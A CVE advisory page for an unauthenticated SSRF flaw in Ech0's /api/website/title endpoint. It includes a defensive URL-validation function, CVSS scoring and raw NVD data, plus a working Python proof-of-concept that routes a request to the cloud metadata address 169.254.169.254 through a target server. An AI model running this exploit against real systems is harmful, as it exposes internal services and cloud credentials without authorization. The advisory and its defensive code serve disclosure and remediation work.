Security Vulnerability Report
CVE-2026-35037 (CVSS 7.2, HIGH)

Published: 2026-04-06 17:17:13
Last Modified: 2026-04-22 18:59:56

Description

Ech0 is an open-source, self-hosted publishing platform for personal idea sharing. Prior to 4.2.8, the GET /api/website/title endpoint accepts an arbitrary URL via the website_url query parameter and makes a server-side HTTP request to it without any validation of the target host or IP address. The endpoint requires no authentication. An attacker can use this to reach internal network services, cloud metadata endpoints (169.254.169.254), and localhost-bound services, with partial response data exfiltrated via the HTML <title> tag extraction. This vulnerability is fixed in 4.2.8.
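
The missing control in the description above is host/IP validation before the server-side fetch. The following is an added example, not Ech0's code or its 4.2.8 fix, of the check a title-fetch endpoint needs: parse the URL, resolve the host, reject anything that is not a globally routable unicast address (which covers 169.254.169.254 and localhost), and hand back the resolved addresses so the fetch connects to a pinned IP. The `resolve` hook and the hostnames and addresses used in testing are constructed for this example.

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_public_ip(addr: str) -> bool:
    """Globally routable unicast only: loopback, RFC 1918, link-local (169.254/16,
    home of cloud metadata), multicast and IPv4-mapped IPv6 forms are rejected."""
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # "::ffff:127.0.0.1" must count as loopback
    return ip.is_global and not ip.is_multicast

def system_resolve(host: str, port: int) -> list[str]:
    """System resolver; normalises literals like "0x7f.1" or "2130706433" to "127.0.0.1"."""
    return [ai[4][0] for ai in socket.getaddrinfo(host, port, proto=socket.IPPROTO_TCP)]

def validate_fetch_target(url: str, resolve=system_resolve) -> list[str]:
    """Vet a user-supplied URL before a server-side fetch (the check the
    /api/website/title endpoint lacked). Returns the public IPs the host resolves
    to so the caller can connect to one of them, closing the DNS-rebinding window
    between check and fetch. Raises ValueError on rejection; resolve is injectable."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parsed.scheme!r}")
    host = parsed.hostname
    if not host:
        raise ValueError("missing host")
    if parsed.username or parsed.password:
        raise ValueError("credentials in URL not allowed")
    try:  # literal IP: judge it directly, no DNS involved
        ipaddress.ip_address(host)
        candidates = [host]
    except ValueError:
        port = parsed.port or (443 if parsed.scheme == "https" else 80)
        candidates = list(dict.fromkeys(resolve(host, port)))
    if not candidates:
        raise ValueError(f"{host!r} did not resolve")
    # One non-public record among several is enough to reject the whole host.
    bad = [ip for ip in candidates if not is_public_ip(ip)]
    if bad:
        raise ValueError(f"{host!r} points at non-public address(es): {bad}")
    return candidates

def is_safe_fetch_url(url: str, resolve=system_resolve) -> bool:
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        validate_fetch_target(url, resolve)
        return True
    except ValueError:
        return False
```

The returned address list is what the HTTP client should connect to; re-resolving the hostname at fetch time would reopen the rebinding gap the check closed.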

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ech0:ech0:*:*:*:*:*:*:*:* - VULNERABLE
Ech0 < 4.2.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def check_ssrf(target_host):
    """
    Exploit CVE-2026-35037: Ech0 SSRF via /api/website/title
    """
    # Vulnerable endpoint
    endpoint = "/api/website/title"
    # Target internal service (e.g., AWS Metadata)
    # Note: In a real test, replace with a controlled internal domain
    payload_url = "http://169.254.169.254/latest/meta-data/ami-id"
    full_url = f"http://{target_host}{endpoint}?website_url={payload_url}"
    try:
        response = requests.get(full_url, timeout=5)
        if response.status_code == 200:
            print(f"[+] Request sent to: {full_url}")
            print(f"[+] Response Status: {response.status_code}")
            print(f"[+] Response Body: {response.text}")
            if "ami-" in response.text or response.text != "":
                print("[!] Potential SSRF vulnerability confirmed!")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error occurred: {e}")


if __name__ == "__main__":
    target = "example.com"  # Replace with actual target
    check_ssrf(target)
```

References

https://github.com/lin-snow/Ech0/security/advisories/GHSA-cqgf-f4x7-g6wc (Vendor Advisory; Exploit; Mitigation)
Weakness: CWE-918 (Server-Side Request Forgery)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-35037", "sourceIdentifier": "[email protected]", "published": "2026-04-06T17:17:13.093", "lastModified": "2026-04-22T18:59:55.523", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ech0 is an open-source, self-hosted publishing platform for personal idea sharing. Prior to 4.2.8, the GET /api/website/title endpoint accepts an arbitrary URL via the website_url query parameter and makes a server-side HTTP request to it without any validation of the target host or IP address. The endpoint requires no authentication. An attacker can use this to reach internal network services, cloud metadata endpoints (169.254.169.254), and localhost-bound services, with partial response data exfiltrated via the HTML <title> tag extraction This vulnerability is fixed in 4.2.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ech0:ech0:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.2.8", "matchCriteriaId": "9571E0F6-6EAF-4AFD-AE06-4E579DFE798A"}]}]}], "references": [{"url": "https://github.com/lin-snow/Ech0/security/advisories/GHSA-cqgf-f4x7-g6wc", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
```